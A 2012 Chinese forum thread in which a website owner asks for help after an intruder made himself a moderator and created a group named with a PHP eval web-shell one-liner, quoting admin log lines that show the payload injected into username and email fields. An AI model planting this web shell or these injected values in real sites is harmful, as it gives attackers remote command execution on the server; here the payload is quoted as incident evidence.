<?php @eval($_POST[cmd])?>，注入风险，求帮助

蒋奉杉 · 发表于 2012-12-8 21:27:55

新安装的，程序没几天，发现网站有一个注册用户，他直接提升自己为实习版主了，用户组中，同时也多了一个，用如下代码，做名称的组，<?php @eval($_POST[cmd])?>，同时，在服务器中，扫描，程序文件，发现，/data/log/201212_cplog.php
中，也存在，于这行代码相关的记录，
有很多，其中，部份如下：
<?PHP exit;?> 1354537724 admin 1 112.81.19.226 members GET={operation=add; newusername=<?php eval($_POST[cmd]);?>; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=<?php eval($_POST[cmd]);?>; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?> 1354537751 admin 1 112.81.19.226 members GET={operation=add; newusername=12‘<?php eval($_POST[cmd]);?>; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=12‘<?php eval($_POST[cmd]);?>; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?> 1354537761 admin 1 112.81.19.226 members GET={operation=add; newusername=123; newpassword=123456; newemail=<?php eval($_POST[cmd]);?>; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=<?php eval($_POST[cmd]);?>; newgroupid=10; };
<?PHP exit;?> 1354537771 admin 1 112.81.19.226 members GET={operation=add; newusername=123; newpassword=123456; newemail=<?php eval($_POST[cmd]);?>@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=<?php eval($_POST[cmd]);?>@daf.com; newgroupid=10; };
<?PHP exit;?> 1354537780 admin 1 112.81.19.226 members GET={operation=add; newusername=123; newpassword=123456; newemail='<?php eval($_POST[cmd]);?>1@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail='<?php eval($_POST[cmd]);?>1@daf.com; newgroupid=10; };

求帮助！！！！！！！！

1017057078 · 发表于 2012-12-8 22:21:02

提示: 作者被禁止或删除内容自动屏蔽

pbdq · 发表于 2012-12-9 11:09:18

这个是别人放木马。

mark35 · 发表于 2012-12-9 17:36:01

被人利用转义漏洞注入攻击

m.king · 发表于 2012-12-10 11:43:53

问题已经收到，我们会看看是否是逻辑代码的问题。

		自动登录	找回密码
密码			立即注册